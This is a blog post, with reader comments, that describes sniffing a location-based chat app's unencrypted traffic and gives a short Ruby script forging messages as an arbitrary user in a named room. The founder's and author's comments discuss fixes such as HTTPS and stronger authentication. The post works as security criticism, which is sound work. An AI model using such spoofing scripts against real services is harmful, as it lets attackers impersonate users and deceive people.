Hacking MessageParty with HTTParty

From Mashable: “MessageParty, an early-stage YCombinator-funded startup, takes the classic concept of a chat room and adds a geosocial twist by making any chat room location-aware.” Here’s the TechCrunch link.

Not a new idea. But the app is actually pretty cool in its simplicity (though still rough around the edges), and I found the video absolutely hilarious and illustrates the new world we live in:

Ok cool… hacking time now. I’ve been really interested in real-time mobile stuff lately, so I was curious on how this service works. Enter Wireshark (formerly Ethereal), a packet sniffer. So I connect my iPhone to WiFi and started looking around… they pass around the messages via plaintext HTTP in JSON payloads… looks like the client polls the server with a GET every few seconds. Simple enough… Ok let’s set up a filter “http && ip.addr == 184.106.229.49″ (that’s their server’s IP) and take a better look:

Simple enough… they’ve got some kind of ruby app up behind the scenes, the client GETs /rooms/:id/roommessages.json to get the new messages, and POSTs to /roommessages.json for outgoing messages. The JSON payload just basically has your profile pic url, your user_id, the room_id and the message you want to send.

Let’s continue the MessageParty with HTTParty!

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
require 'rubygems'
require 'httparty'
require 'json'
 
class Party
include HTTParty
base_uri 'messageparty.net'
def post room, message
headers = {
"User-Agent" => "MessageParty/1.0 CFNetwork/485.2 Darwin/10.3.1",
"Content-Type" => "application/json",
"Accept" => "application/json",
"Accept-Language" => "en-us",
 
}
 
body = {
"roommessage" => {
"room_id" => "#{room}",
"imgurl" => "http://www.digyourowngrave.com/content/antoine_dodson.jpg",
"text" => message,
"user_id" => "1130",
"displayname" => "Antoine D"
}
}
options = { :body => body.to_json, :headers => headers}
response = self.class.post('/roommessages.json', options)
puts response.inspect
end
end
 
Party.new.post(1083, "You don't have to come, and confess, we looking for you")
view raw party.rb hosted with ❤ by GitHub

Fake the headers, fake the JSON payload, cuz they be faking everybody out there … and voila…

I don’t mean to be an ass, but this just ain’t gonna fly… I didn’t check if they rate limit, but you can pretty much spoof anything in there… I know it’s a very early version, but common guys… you got YC funding and tons of press.. surely you could have done better for the first version?

  • AP

    Hey Andre – Amanda here, founder of MessageParty. Thank you so much for this post – we’ve been working non-stop trying to make the app better and I appreciate that you took the time to point this out – app updates coming soon!

    Amanda

  • Anonymous

    Something you can try right away in 10 minutes is simply set up a certificate on the domain, and put a redirect from http to https. The iPhone *might* pick it up fine, and that way you won’t have prying eyes like mine looking at how to spoof things..

    Doing what I’m doing is fine, since hopefully you guys would have an API at some point, but the authentication and security checks should be stronger…

    As far as the app goes, please don’t block the UI by doing network requests in the main thread… the app freezes each time it updates for new messages.

    Good luck!

  • Andrew Hart

    Is MessageParty still active? I created essentially the same thing without even realising it had been done before. It’s currently in beta for iPhone – http://geolocha.com/